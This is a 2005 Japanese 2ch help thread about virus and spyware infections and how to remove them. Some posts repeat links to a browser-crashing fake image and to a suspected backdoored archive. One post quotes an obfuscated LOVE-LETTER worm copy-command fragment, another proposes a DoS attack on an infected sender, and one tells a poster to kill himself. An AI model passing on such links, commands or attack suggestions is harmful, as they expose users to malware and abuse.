ベンダーが新種と言ってるんじゃなくてこの人↓が某スレで言ってたんです

195 名前:-7.74Dさん 投稿日:2005/12/03(土) 00:23:59
新種のトロイじゃん!
削除出来ねぇ〜!
678名無しさん@お腹いっぱい。:2005/12/05(月) 22:44:26
Windows XP Pro sp2、
ノートンとスパイボットとアドウエア入れて、それぞれシロです。

ファイルを削除したのに、以前よりHDDの容量が増えてます。
なにかいけないものがインストされてるんでしょうか?
679名無しさん@お腹いっぱい。:2005/12/05(月) 22:49:28
>>678
増設もしていないのにハードディスクの容量など増えません
ファイル一覧の詳細でも保存しといてそれと比べろや
680名無しさん@お腹いっぱい。:2005/12/05(月) 22:50:15
>>677
システムの復元ファイルでも増えたんじゃね?
681678:2005/12/05(月) 23:10:14
>>679
すいません、増えたのは使用領域です・・・。
ファイル一覧の詳細保存の仕方は?
682679:2005/12/05(月) 23:35:39
お・・・俺は詳細保存とかなんとか言ってないぞ!
言ってないんだからな!やり方訊かれたって分かんないぞ!
683名無しさん@お腹いっぱい。:2005/12/06(火) 00:02:54
先程シマンテックのオンラインスキャンをしたところ
D:\programs\battlefield 1942 demo\battlefield 1942 demo\fpupdate.exe は Adware.GameSpyArcade に感染しています。
D:\programs\battlefield 1942\fpupdate.exe は Adware.GameSpyArcade に感染しています。
C:\WINDOWS\Downloaded Program Files\gsda.dll は Adware.GameSpyArcade に感染しています。
と診断されました。
これってGAMESPYからダウンロードした何らかのファイルをウィルスと間違えてるって事ですか?
XP HOME SP2でウィルス対策は何もしてないので少し不安になり書き込みました。
684名無しさん@お腹いっぱい。:2005/12/06(火) 00:28:45
>>683
間違いなく感染しているんだからそれでいいんじゃない?
685名無しさん@お腹いっぱい。:2005/12/06(火) 00:47:39
>>683

オンラインスキャンまでしたなら、調べればいいじゃないか…ほい

ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-adware.gamespyarcade.html
686名無しさん@お腹いっぱい。:2005/12/06(火) 00:54:30
>>682
間違えてるんじゃなくて、フリーのアイテムを無防備にインスコした時点で
潜り込まれてるんだから検出結果は正しい。
687名無しさん@お腹いっぱい。:2005/12/06(火) 01:08:10
>>672です。
>>674氏、アドバイス有難うございました。レス遅くなってすみません。
688名無しさん@お腹いっぱい。:2005/12/06(火) 01:22:59
>>685
本当にありがとうございました。
GAMESPYブラウザ使用時のみのポップアップのようですので放置します。
689名無しさん@お腹いっぱい。:2005/12/06(火) 14:40:54
( ^3^)≡○#) 3・)∴.;
690名無しさん@お腹いっぱい。:2005/12/06(火) 17:32:35
知恵をお貸し下さい。

W32.Netsky.Q@mm型ウィルスメールが1日に数回届きます。
ウィルス自体はノートン先生が毎回削除してくれるのでシステムには影響ないのですが、
あまりにも頻繁にくるので発信者に「感染してるよ」と教えて駆除してもらいたいと思ってます。
ところがこのメールの発信者は詐称してあり誰が送ってきているのか自分にはお手上げです。

このウィルスに感染しているPCを特定することは出来ませんか?
691名無しさん@お腹いっぱい。:2005/12/06(火) 17:35:09
>>690
recievedをみてプロバイダが特定できたらそこに通報するぐらいしかできない。
692名無しさん@お腹いっぱい。:2005/12/06(火) 18:11:46
>>691
そうですか。一応連絡しつつ本人が気づくのを気長に待つことにします。ありがとうございました。
693名無しさん@お腹いっぱい。:2005/12/06(火) 20:56:08
>>690
送ってきたばかりでIPアドレスがまだ変わってなさそうだったら、
DOS攻撃をしてやる。
694名無しさん@お腹いっぱい。:2005/12/06(火) 21:11:03
>>692
途中経路とプロバイダに迷惑かかるからやめれ
つか逆にプロバイダに営業妨害で告発されるぞ
695名無しさん@お腹いっぱい。:2005/12/07(水) 00:02:59
お願いします。

ttp://www.trasher.ru/foto/trasher/trasher.jpg

これを踏んで、画面にマイクロソフトのtelnetに
繋ごうとブラクラ状態になりました。

【使用OS】 XP SP1
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ノートンアンチウィルス2005
【ちゃんとUpdateしてるか】 しています
【スキャンした結果(ウイルス名・発見場所)】
スキャンしたウィルス名: HackTool.Dos
場所:Temporary Internet Files\Content.IE5
\AXHIZQ1S\trasher[1].jpg
【症状を具体的に、分かる限りすべて書く】
画面にマイクロソフトのtelnetに繋ごうとブラクラ状態
になりました。怖くて、すぐに回線を切りました。
【これまでにとった措置】
ノートンが自動的に遮断、削除しました。

もしノートン先生が遮断しなかったら、いったいどういう
被害をこうむっていたんでしょうか?
696名無しさん@お腹いっぱい。:2005/12/07(水) 00:06:23
「ブラクラ状態」とは何ぞや?
697名無しさん@お腹いっぱい。:2005/12/07(水) 00:11:13
>696
ブラジャーがクララ状態
698名無しさん@お腹いっぱい。:2005/12/07(水) 01:13:30
http://profiles.yahoo.co.jp/ami_lala_0l8
知っている人は知っている。きっと奴の正体だ!
699名無しさん@お腹いっぱい。:2005/12/07(水) 17:26:59
( ^3^)≡○#) 3・)∴.;
700名無しさん@お腹いっぱい。:2005/12/07(水) 20:06:39
NHKのクローズアップ現代のスパイウエア特集で画像を見たり動画を見るだけで
感染するスパイウェアがあると聞いて飛んできました。

画像で感染とはJPGファイルを開いただけで感染ということでしょうか?
動画の場合、codecを取りにいくときに感染という理解でいいでしょうか?

使っているOSはknoppixです。心配でトイレにもいけません。よろしくお願いします。
701名無しさん@お腹いっぱい。:2005/12/07(水) 20:43:25
>>700
このスレの住民は質問者を嘲笑うしか能が無いのでそんな事は自分で調べましょう。

もしくはOKWave
702名無しさん@お腹いっぱい。:2005/12/07(水) 21:01:31
>>700
スパイウェアが心配なら、Ad-Awareとかで毎回駆除してみたらどうかね。
変なサイトいったりFirefoxとかのブラウザ使えば、大して入ってこないけどね。
703名無しさん@お腹いっぱい。:2005/12/07(水) 21:04:05
ごめ、knoppixの場合は上の使えるかどうかしんない。。。
Linuxだっけ・・・?わかんないやー。テヘ。
704名無しさん@お腹いっぱい。:2005/12/07(水) 21:11:11
Windows Media Player(動画・拡張子wmv)の脆弱性を狙ったウィルスや
Microsoft Office(画像・拡張子jpg)の脆弱性を狙ったウィルスは知っているけど、

> 画像を見たり動画を見るだけで感染するスパイウェアがある

そんなスパイウェアあるのか。知らなかった…。フリーウェアをインストールするときか、
Webブラウズ中にActiveXで入れちゃうだけかと、思ってた…。心配でトイレにいけなくなりそうです。
705名無しさん@お腹いっぱい。:2005/12/07(水) 21:44:24
ウイルスバスター12 インターネット セキュリティ 15ヶ月版
マカフィー セキュリティセンター (15ヶ月間更新サービス)
↑のどちらかの選択に迫られてるんだけど、
お前らならどっちにする?
706名無しさん@お腹いっぱい。:2005/12/07(水) 21:50:14
スマソ 場違いだな 逝ってくる
707名無しさん@お腹いっぱい。:2005/12/07(水) 22:03:27
ttp://www.trasher.ru/foto/trasher/trasher.jpg を踏んでしまいました(泣

【使用OS】 XP
【WindowsUpdateしてるか】 していません
【AntiVirusは何を使っているか】 ウィルスバスター
【ちゃんとUpdateしてるか】 ひっかかる1時間前にしたばっか
【スキャンした結果(ウイルス名・発見場所)】
HTML_CRINET.A   Internet FILEの中にあるようです。
【症状を具体的に、分かる限りすべて書く】
ウィルスバスターが、ウィルスを隔離。
しかしその後黒いウィンドウが沢山出てきた。
【何をしたらそんなことになったのか】
ttp://www.trasher.ru/foto/trasher/trasher.jpg を踏んでしまった。
【これまでにとった措置】
ウィルスバスターが隔離し、「安全です」という表示になっているが、
yahooの検索バーに文字を打ち込み、漢字変換しようとすると、文字の位置が変にズレる。

【その他の質問】
感染したばかりで、まだ見つけた被害が少ないですが、
このまま放置していて大丈夫でしょうか?
インターネットファイルにある、ウィルスは削除したほうがいいのでしょうか?

宜しくお願いします。
708名無しさん@お腹いっぱい。:2005/12/07(水) 22:21:41
>>707です。
上のほうに、被害仲間がいらっしゃいましたね・・・。
でも、具体的な解決方法が書いていない!
どうしたらいいんでしょう・・・。
709名無しさん@お腹いっぱい。:2005/12/07(水) 22:42:22
>>707
さっさとWindowsUpdateにいって来い
それからIEのキャッシュなぞ消してしまえ
そして忘れろ
710名無しさん@お腹いっぱい。:2005/12/07(水) 22:56:24
>>706
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_CRINET.A
>>708の言うとおり、IEのキャッシュを全部消す。
最新パターンファイルで全ドライブ検索して問題なければそれ以上気にする必要はないと思われ。
711名無しさん@お腹いっぱい。:2005/12/07(水) 23:13:44
>>709-710
ありがとうございます。
Windows Update、優先順位の高いUpdateはありませんと出ました。
今現在、そこそこ新しいもののようです。
ウィルスバスターでウィルス検索しましたが、何も出てきませんでした。

IEのキャッシュの削除は、ブラウザ→ツール→インターネットオプション→ファイルの削除
で、いいんですよね?
念のため、訪問履歴も消しました。
それほど悪意のあるウィルスではなくてよかったです。ありがとうございました。
712名無しさん@お腹いっぱい。:2005/12/08(木) 00:44:26
おい、もまえら!(*´Д`*)
VirusTotalって知ってるか? シラネ?ヽ(´ー`)ノ
ttp://www.virustotal.com/flash/index_en.html
このページの一番上にうpろだがついているわけだが、
ここにウイルスじゃないか?っていうファイルを送ると
いろいろなメーカーのウイルスソフトで検索してくれる。
それで各社に報告までしてくれちゃうのだ。便利っぽ!
疑わしいファイルがあればうpしてみ! 以上。
713名無しさん@お腹いっぱい。:2005/12/08(木) 01:56:32
スパイウェアなのかウイルスなのか区別がつきませんでしたので、
こちらで質問させて頂きます。

【使用OS】 win2000
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウィルスバスター 2005
【ちゃんとUpdateしてるか】 毎日Updateしています。
【スキャンした結果(ウイルス名・発見場所)】
ウイルスは発見されませんでした。
【症状を具体的に、分かる限りすべて書く】
使用しているウインドウが突然非アクティブ状態になってしまいます。
タスクマネージャでプロセスを見ていると5〜6分に1度何かのプログラムが走っているようです。
それと同時に「C:\WINNT\system32」のフォルダ内に「3r8pcbn9.html」というhtmlファイルが作られていました。
htmlファイルをテキストエディタで開いてみましたが何も書かれていませんでした。

【何をしたらそんなことになったのか】
原因は不明です。
【これまでにとった措置】
ウイルスバスター2005、Spybot(共にUpdate済)でスキャンしましたが問題はありませんでした。
googleで同じような症状を検索してみましたが、探し方が不味いのか回答となるようなページが
引っかかりませんでした。

宜しくお願いします。
714名無しさん@お腹いっぱい。:2005/12/08(木) 04:42:05
SE1R78 07.12.2005
↑が貼られてたのですがこれは何ですか。
715名無しさん@お腹いっぱい。:2005/12/08(木) 08:40:17
        rn  
     / ̄・ヽ      <と、いうわけ
    ・、_ ノ /  ̄ヽ 
    (__)⊂ヽ/  ,-、  ) 
     (___)__人_ノ 
      ~ ~ 
716名無しさん@お腹いっぱい。:2005/12/08(木) 15:17:47
教えてください。カスペルスキーを導入してから日に数回「Helkern」に攻撃されてます。
撃退されてますが、なんだか気持ち悪いです。
何か良い対処法を教えてください。
717MONA ◆ApRjtwCQJQ :2005/12/08(木) 17:19:26
  ∧_∧
 ( ´∀`)  
 (    ) 
 | | |  
 (__)___)

>>713
http://www.altech-ads.com/product/10001114.htm

>>716
SQL Slammerでしょ。セッションレスのExploitです。
そもそも個人PCでSQL Serverを使ってる人なんておよそ居ないと思うんで
関係ないです。ルータを導入してますか。
718名無しさん@お腹いっぱい。:2005/12/08(木) 20:20:21
パッチを当て既知のセキュリティーホールを塞ぎ、拡張子の偽装は別として
jpg画像をヴュワーで閲覧しただけで感染するウィルスは現在確認されていますか?
719SOS代理人:2005/12/08(木) 20:24:20
【使用OS】 XP PRO
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 ウイルスバスター2005
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 おぼえてない
【別のオンラインスキャンしたならその結果は】 未スキャン
【症状を具体的に、分かる限りすべて書く】
「おまえが踏まなきゃ誰が踏む」というダイアログ表示。
「うららうららうらうらら」(山本リンダ)というBGM付きで。
リカバリー後もnyを立ち上げようとすると
ウイルスバスター2005が反応する
そのため、nyができない
【何をしたらそんなことになったのか】 ?
【これまでにとった措置】
リカバリー
【その他の質問】
OSのクリーンインストールでOK?
正式なウイルス名・対処法教えてください
720名無しさん@お腹いっぱい。:2005/12/08(木) 20:29:36
>>719
>>1を読んで
721名無しさん@お腹いっぱい。:2005/12/08(木) 20:34:50
>>718
ない
722716:2005/12/08(木) 20:42:24
>>717
レスありがとうございます。
難しすぎて私にはさっぱり分かりませんが、気にしなくて良いってことですか?
723名無しさん@お腹いっぱい。:2005/12/08(木) 22:12:51
>>718
W32/Perrun
724713:2005/12/08(木) 22:22:30
>>717
アドバイスありがとうございます。
紹介して頂いたソフトで何のプログラムが動いているのか確認してみます。
725名無しさん@お腹いっぱい。:2005/12/08(木) 22:34:51
今 実況dでる?
726名無しさん@お腹いっぱい。:2005/12/09(金) 02:49:34
ウイルスの除去方法を教えてください。

【使用OS】XP
【スキャンした結果(ウイルス名・発見場所)】 TROJ_ISTBAR>GG
【別のオンラインスキャンしたならその結果は】 オンラインスキャンのみで発見
【症状を具体的に、分かる限りすべて書く】 ちょっと重い
【何をしたらそんなことになったのか】 ファイルのダウンロード・・?
【これまでにとった措置】 コントロールパネルでistv (?) を削除
【その他の質問】
トレンドマイクロのHPでウイルスを探しましたが、GGは乗ってませんでした。
誰か教えてください。
727名無しさん@お腹いっぱい。:2005/12/09(金) 03:17:42
もう一回
省略するでない。
728教えて下さい:2005/12/09(金) 03:27:15
bravehostってそんなやばいんすか?被害とかくわしいかたいますか?
729名無しさん@お腹いっぱい。:2005/12/09(金) 03:37:09
730名無しさん@お腹いっぱい。:2005/12/09(金) 03:38:11
すいません 抜けてました。
使用OS】 XP
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】ウイルスバスター2006
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 TROJ_ISTBAR.GG
【別のオンラインスキャンしたならその結果は】 していない
【症状を具体的に、分かる限りすべて書く】 ちょっと重い
【何をしたらそんなことになったのか】 ダウンロード・・?詳しくは不明
【これまでにとった措置】 コントロールパネルでistv(?)を削除
【その他の質問】
トレンドマイクロのHPでウイルスを探しましたが、GGは乗ってませんでした。
誰か教えてください。

これでわかるでしょうか?
731名無しさん@お腹いっぱい。:2005/12/09(金) 14:00:22
nyやってる奴はここに来るべきではない。
どうすればいいのか分からない時は、素直にOSリカバリしろ。

それでも駄目な場合は、パソコン捨てちまえ。
二度とネットに繋ぐな。
732名無しさん@お腹いっぱい。:2005/12/09(金) 18:18:36
使用OSMe
ウィルスバスター2005
アップデートは感染後
メモリを埋め尽くした後にページファイルを埋めていくらしくチェック不可
起動後5分〜10分で↑の症状
フレッツ接続ツールとウイルスバスターの相性が悪く、常駐させずオンラインでアプリのダウンロード
感染発症後にソフト常駐させるも反応無し、セーフモードでも発症ファイルチェック不可

よろしくおねがいします
733名無しさん@お腹いっぱい。:2005/12/09(金) 19:04:56
リカバリのみ
734732:2005/12/09(金) 19:06:36
メインドライブの空き容量が目に見えて減っていくのが恐くて
埋まりきる前に電源を切ってたんですが
そのまま放置してみたところ残り600MBぐらいで回復して
ウィルスチェックもできるようになりました、すみません
735名無しさん@お腹いっぱい。:2005/12/09(金) 21:30:46
>>732
・接続にルーターを使うようにしてみたらどうか?
・出来ればWinXPにしたら?
736名無しさん@お腹いっぱい。:2005/12/09(金) 23:19:18
>731
何も知らん、アドバイスも出来んくせに
能書きたれるなカス!
さっさと回線切って
首吊って氏ね
737名無しさん@お腹いっぱい。:2005/12/09(金) 23:49:52
アドバイスは「素直にリカバリしろ」ってとこだろ。別に間違ってないと思うよ。
738名無しさん@お腹いっぱい。:2005/12/10(土) 00:03:05
リカバリを知らないんだよ、きっと。
739名無しさん@お腹いっぱい。:2005/12/10(土) 01:49:14
virustotalでの検知いいね〜
いろいろなメーカーのウイルス対策ソフトの比較になる。
スパイウェアではnod32とkaspaskyが検知率高い!
740名無しさん@お腹いっぱい。:2005/12/10(土) 06:31:27
>737
>738
馬鹿かお前ら
お前ら、メーカーパソコンしか使った事ないだろ?
そんな猿でも分かる答えなんか期待してない
741名無しさん@お腹いっぱい。:2005/12/10(土) 07:37:24
>740
メーカーパソコンとか関係ないでしょ・・・
悪質なウィルスにつかまったら、リカバリしかなくなる事だってあるじゃない。
人のアドバイス気に食わないなら、黙って自分で駆除方法探しなよ。
742名無しさん@お腹いっぱい。:2005/12/10(土) 09:21:41
>740
じゃぁ、窓から投げ捨てるといいんじゃない?
743名無しさん@お腹いっぱい。:2005/12/10(土) 11:52:36
【使用OS】 Windows XP
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 BitDefender 9
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】 Trojan.downloder.small.wv とviploader??
【別のオンラインスキャンしたならその結果は】 何も検出されませんでした
【症状を具体的に、分かる限りすべて書く】 インターネット接続がよく突然切れるようになった
                     パソコンが何をするにもすごい重い
                     
【何をしたらそんなことになったのか】 わかりません
【これまでにとった措置】 Bit defender.Ad-Aware.a-squared.MicrosoftAntiSpyware
Hijack Thisでバカみたいにスキャン&削除しました。
            上に書いたトロイは見つけることが出来るんですけど
            削除できません。
【その他の質問】 どうかたすけてください(´・ω・`)よろしくお願いします。
744名無しさん@お腹いっぱい。:2005/12/10(土) 12:08:54
セーフモードで削除
745名無しさん@お腹いっぱい。:2005/12/10(土) 12:20:18



   ,ィ'ヽ、  ,r'" ̄`゙ヽ' 助けてください。
   ヾ、 ヽ、/ ・  ・   ';     Trojan.StartPage に感染しているのですがスキャンして検出後駆除しているにも
     `ヽ、`ヽ     l     かかわらず、インターネットを立ち上げると必ず「ノートンがウイルスを検出して
     __,.-' ノ      |     削除しました」と表示されるのに、必ず出てきます。
    (_,. -1      ,!     
        ゝ、__,ノ      どこかに潜んでいて、インターネットを立ち上げるたびに出現するようです。
                    ホームページも置き換わります。ひっつこいヤツで困っています。
                    どうかご指導をよろしくお願いします
746名無しさん@お腹いっぱい。:2005/12/10(土) 12:24:56
>>745
マルチ乙。
747名無しさん@お腹いっぱい。:2005/12/10(土) 13:47:44
>>745

           i::::::::/'" ̄ ̄ヾi
           |:::::::| ,,,,,_  ,,,,,,| 
           |r-==( 。);( 。)   
           ( ヽ  :::__)..:: }
        ,____/ヽ  ー== ;  ほほう それでそれで?
     r'"ヽ   t、   \___ !
    / 、、i    ヽ__,,/
    / ヽノ  j ,   j |ヽ 
    |⌒`'、__ / /   /r  |
    {     ̄''ー-、,,_,ヘ^ |
    ゝ-,,,_____)--、j
    /  \__       /
    |      "'ー‐‐---''
748携帯からです:2005/12/10(土) 15:07:30
偽のaboutblankにホームを変更されてしまうスパイウェアに感染しました。フリーのスパイボットやアドウェアを用いてスキャンして削除しましたが効果ありません。
有料のやつでabout・blank・search・for型に対応できるやつを知っていましたら教えてください。
あとリカバリしたとすれば購入時についてたソフトを使ってWordやExcelも復活できますか?XPのソフトはあるのですがWordなどはないです。Personal云々とかいうソフトはありました。初心者すぎる質問ですみません。
749MONA ◆ApRjtwCQJQ :2005/12/10(土) 15:37:00
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < >>748
 | | |  \_____
 (__)___)

http://www.higaitaisaku.com/removeaboutblank.html

あと、OfficeのCDは購入時に付いてきませんでしたか。
そのPersonalはOffice Personalではないのですか。
750748:2005/12/10(土) 16:02:18
>そのPersonalはOffice Personalではないのですか。

たしかそうでした。

ご提示のサイトは自力で発見し、自分のスパイウェアがabout・blank・search・for型と知りました。
が、02などのログをスキャンする作業からが難しすぎて分からないので、できるだけ対策ソフトで解決したかったので、上の書き込みをしました。
そして、僕は仕事でパソコンを使ったりとかではないので、マイドキュメント内の写真やレポート少々さえ残ればいいので、リカバリをしてもいいかなと考えました。
どうすればいいのかアドバイスください。
751名無しさん@お腹いっぱい。:2005/12/10(土) 16:18:49
PCの説明書みた方がいいよ
752MONA ◆ApRjtwCQJQ :2005/12/10(土) 16:22:21
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < >>750
 | | |  \_____
 (__)___)

それでしたら、必要なデータ類をバックアップした後に
リカバリをかけて下さい。データ類を戻すときには念のため
スキャンにかけて下さい。

753748:2005/12/10(土) 16:28:20
>>751 >>752

ありがとうございました。説明書見ながらやってみます。ありがとうございました。
メーカー製のパソコンを買っててよかったです。
754名無しさん@お腹いっぱい。:2005/12/10(土) 17:20:17
【使用OS】WindowsXP Home
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】Antivir ver6
【ちゃんとUpdateしてるか】はい
【スキャンした結果(ウイルス名・発見場所)】
C:\WINDOWS\nxstinst.exe は SecurityRisk.NavHelper に感染しています。
C:\WINDOWS\remover.dll は SecurityRisk.NavHelper に感染しています。
【別のオンラインスキャンしたならその結果は】シマンテックオンラインスキャンで上のファイルを検出
【症状を具体的に、分かる限りすべて書く】特になし
【何をしたらそんなことになったのか】いつのまにか
【これまでにとった措置】googleで検索
【その他の質問】

この前変なURL踏んで気になったのでオンラインスキャンしてみたんですが、97個の感染ファイルが出ました
そのうちの二つなんですが、これは何なんでしょうか?nxstinst.exe と remover.dll をgoogleで検索しましたが
日本語ではほとんどヒットしませんでした。どうすればいいでしょうか?

あと、97個の感染ファイルのうち、上の二つ以外は全てOpenJaneの2chのログだったんですが
これは放置しても大丈夫でしょうか?

お願いします
755名無しさん@お腹いっぱい。:2005/12/10(土) 17:27:14
NavExcel  BHO
756名無しさん@お腹いっぱい。:2005/12/10(土) 19:50:20
> どうすればいいでしょうか?
設定の項目でRepair with prompt、Delete with promptの順に設定しておけばいいんじゃね?
削除できない場合は、セーフモードで。

> 上の二つ以外は全てOpenJaneの2chのログだった
2ちゃんねるに貼られた c.C,o,p,y,(d,i,r,s,y,s,t,e,m,&"\L,O,V,E,-,L,E,T,T,E,R,-,F,O,R,,-,Y,O,U.T,X,T.v,b,s,")
こういうのに反応していると思われる。
757名無しさん@お腹いっぱい。:2005/12/10(土) 21:36:46
【使用OS】WindowsXP
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】ノートン2004 BitDefender
【ちゃんとUpdateしてるか】ノートンのみ2ヶ月弱してません
【スキャンした結果(ウイルス名・発見場所)】
発見場所 → C:\WINDOWS\SYSTEM32\cd_clint.dll
ウイルス名→ Spyware:spyware/cydoor
【別のオンラインスキャンしたならその結果は】
  ノートン・BitDefender・ウイルスオンラインスキャンをやってみて
  Pandaオンラインスキャンをした所このスパイウェアを検出しましたが
  駆除できませんでした。
【症状を具体的に、分かる限りすべて書く】
  ・症状は今の所何もありませんが不安だったので書き込みしました。
  ・dllファイルはむやみに削除してはいけないと聞いたので
   対処法を教えて頂けたら幸いです。
  ・このファイルは購入以前から存在していたファイルでした。
【何をしたらそんなことになったのか】いつのまにか感染してました
【これまでにとった措置】グーグル。ウイルススキャンのみです
【その他の質問】ありません。
758名無しさん@お腹いっぱい。:2005/12/10(土) 21:50:08
759名無しさん@お腹いっぱい。:2005/12/10(土) 22:00:41
>>758さん
レスありがとうございます。
サイトを参考にいろいろやってみます。
760名無しさん@お腹いっぱい。:2005/12/10(土) 22:23:45
>>755
よくわかりません・・・すいません
>>756
すいません、書き忘れてたんですが、Antivirの方でスキャンしても何も検出しないんです
何のファイルかわからないんですがファイルを直接削除したらまずいですかね・・・?
761名無しさん@お腹いっぱい。:2005/12/10(土) 23:23:59
どなたかお願いします。少し泣いてしまいそうです。

【使用OS】 windowsXP Home Edition
【WindowsUpdateしてるか】 いいえ。
【AntiVirusは何を使っているか】 ノートン2002
【ちゃんとUpdateしてるか】 いいえ。
【スキャンした結果(ウイルス名・発見場所)】スキャンしてみたものの見つからず。
【別のオンラインスキャンしたならその結果は】していません。

【症状を具体的に、分かる限りすべて書く】 
>>7のような症状で、シャットダウンのカウントダウンが始まり、
「AUTHORTY\SYSTEMによりLSA Shell(Export Version)を終了します」と出て、
「システムプロセスC:\WINDOW\System32\lsass.exe'」と表示されます。

【何をしたらそんなことになったのか】 
中古で買い、インターネットに接続しようとするとシャットダウンのカウントが始まるため
インターネットには長く繋げず、オンラインスキャンやUpdateが途中で終了されてしまいます。

【これまでにとった措置】 
スキャンでは見つかりませんでした。
リカバリもしてみましたが治りません。
Sasserかと思い、セーフモードで削除しようと試みましたが、avserve.exeなどのファイルが見つからず。

【その他の質問】 
シャットダウンのカウントダウンを9999にするという方法をしようとしたのですが
コンピュータ名が空欄で、参照が機能せず。正しいコンピュータ名を見るにはどうしたらいいのでしょう?
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\SysProcs
にlsass.exeというファイルがあったのですが、これは消してもいいのでしょうか?
762名無しさん@お腹いっぱい。:2005/12/11(日) 00:22:19
>>761 >リカバリもしてみましたが治りません。

そりゃいつまでたっても直らねーよ。裸同然だもの。
すぐ最新のセキュリティーソフト買ってこいよ。
で、ネット切り離してリカバリしてセキュソフトインスコな。
FW効かせてからネットに繋ぐ。
WtnとセキュのUpdate。必ずXPsp2Iにすること
ルーターがつくならそれも入れとけ。

  かんがってやってみ。
763762:2005/12/11(日) 00:24:27
WtnとXPsp2I ってなんだべ?

Win XPsp2 な。
764761:2005/12/11(日) 00:35:23
>>762
ありがとうございます。がんばってみます。
765名無しさん@お腹いっぱい。:2005/12/11(日) 07:56:45
http://strawberry.web-sv.com/Sn2/up3/2.html?1134234277

straw2968.zip (同人誌) [AKKAN-Bi PROJECT (柳ひろひこ)] ACTG1・2.zip 6.2MB 05/12/10(Sat),02:55:16 application/x-zip-compressed

このウィルスってなんですか?
対処法を教えてください。
766名無しさん@お腹いっぱい。:2005/12/11(日) 08:08:40
> このウィルスってなんですか?

AntiVir6.33.0.6112.09.2005no virus found
Avast4.6.695.012.10.2005no virus found
AVG71812.08.2005no virus found
Avira6.33.0.6112.09.2005no virus found
BitDefender7.212.10.2005no virus found
CAT-QuickHeal8.0012.09.2005no virus found
ClamAVdevel-2005110812.09.2005no virus found
DrWeb4.3312.10.2005no virus found
eTrust-Iris7.1.194.012.09.2005no virus found
eTrust-Vet11.9.1.012.09.2005no virus found
Fortinet2.54.0.012.10.2005no virus found
F-Prot3.16c12.09.2005no virus found
Ikarus0.2.59.012.10.2005no virus found
Kaspersky4.0.2.2412.10.2005no virus found
McAfee464712.09.2005no virus found
NOD32v21.131712.09.2005no virus found
Norman5.70.1012.09.2005no virus found
Panda8.02.0012.10.2005no virus found
Sophos4.00.012.10.2005no virus found
Symantec8.012.10.2005no virus found
TheHacker5.9.1.05212.09.2005no virus found
VBA323.10.512.10.2005suspected of Backdoor.Delf.13
767名無しさん@お腹いっぱい。:2005/12/11(日) 08:11:44
> 対処法を教えてください。
実行しない。
実行しても泣かない。
Microsoft Virtual PC 2004等を使う。
レジストリ等を監視し、すぐに戻せる環境で実行する。
768名無しさん@お腹いっぱい。:2005/12/11(日) 13:17:36
( ^3^)≡○
769名無しさん@お腹いっぱい。:2005/12/11(日) 13:50:15
 ヒリヒリ 《( ´;ω;) ...○
770名無しさん@お腹いっぱい。:2005/12/11(日) 16:36:34
771748 750 753:2005/12/11(日) 17:52:41
リカバリは大変そうなのでダメモトで有料のアンチスパイという対策ソフトを購入してみたら、症状は改善しました。
スキャンに40分かかって、悪性クッキーが1個とトロイが33個とハイジャッカーが15個という半端ない数のウィルススパイウェアが検出されて、驚きでした。
が、症状は治っておらず一時はガッカリしましたが、メモリに入ってるんじゃないかと思って、気を取り直して再起動してセーフモードでもう一度スキャンするとまた3個も引っかかり、削除した結果、症状は改善されました。

別に僕はソフト会社の回し者ではありませんが、フリーのものとはスキャンの質が全然違うと思います。事実、フリーのものは5,6分で終わりますし。

アドバイスくれた方、ありがとうございました。
772名無しさん@お腹いっぱい。:2005/12/11(日) 18:03:24
>>771
『リカバリ』まで読んだ。
773名無しさん@お腹いっぱい。:2005/12/11(日) 18:19:09
>>771
「僕はソフト会社の回し者」 まで読んだ
774名無しさん@お腹いっぱい。:2005/12/11(日) 18:28:22
       ∧∧  
〜′ ̄ ̄( ゚Д゚)
 UU ̄ ̄ U U  
775名無しさん@お腹いっぱい。:2005/12/11(日) 18:31:27
目で見える形のウィルスやスパイウェアに感染しないと、とっくにそれまで感染していても全然気付かないタイプ。
結局WindowsUpdateなんて関心がない。
誰も相手にしないから震度家。
776名無しさん@お腹いっぱい。:2005/12/11(日) 20:54:02
(´・ω・`)知らんがな
777名無しさん@お腹いっぱい。:2005/12/11(日) 20:59:36
>>775
『目』まで読んだ。
778776:2005/12/11(日) 21:02:08
誤爆。失礼 (>_<)
779名無しさん@お腹いっぱい。:2005/12/11(日) 21:13:39
>>760
なんだ。スキャンした結果の欄に書いてあったから、てっきりAntiVirが検出したものと…
情報少ないね。>>755 さんの言うとおり、別名NavExcelというらしい。
ttp://www.shareedge.com/spywareguide/product_show.php?id=607
780名無しさん@お腹いっぱい。:2005/12/11(日) 23:07:34
初心者です。
さっき2ちゃんをみていたら
”ノートンがウイルスを検出して削除しました”
って出ました。これで今年4回目です。

これ、もしノートンいれてなかったら
ウイルスに感染していたってことになりますか?
781名無しさん@お腹いっぱい。:2005/12/11(日) 23:10:10
>>780
きちんとWindowsUpdateをしているのならなんともなりません
782名無しさん@お腹いっぱい。:2005/12/11(日) 23:51:09
シャットダウンしようとしたら変な画像が表示されて、HDDがびっくりする
くらい大きな音でガガガ!と鳴り響き、バチッと音と共に電源が切れました。


そういう夢を見たんですが、私とPCは大丈夫でしょうか?
783名無しさん@お腹いっぱい。:2005/12/11(日) 23:54:49
       ∧∧  
〜′ ̄ ̄( ゚Д゚)
 UU ̄ ̄ U U  

「・・・・・・・・・・・・・」
784名無しさん@お腹いっぱい。:2005/12/12(月) 00:50:38
>>782
PCは大丈夫だろうけどあなたは危ないんじゃないかな?
一度病院に行ってみることを勧める 精神科、脳外科あたりに
785名無しさん@お腹いっぱい。:2005/12/12(月) 02:09:51
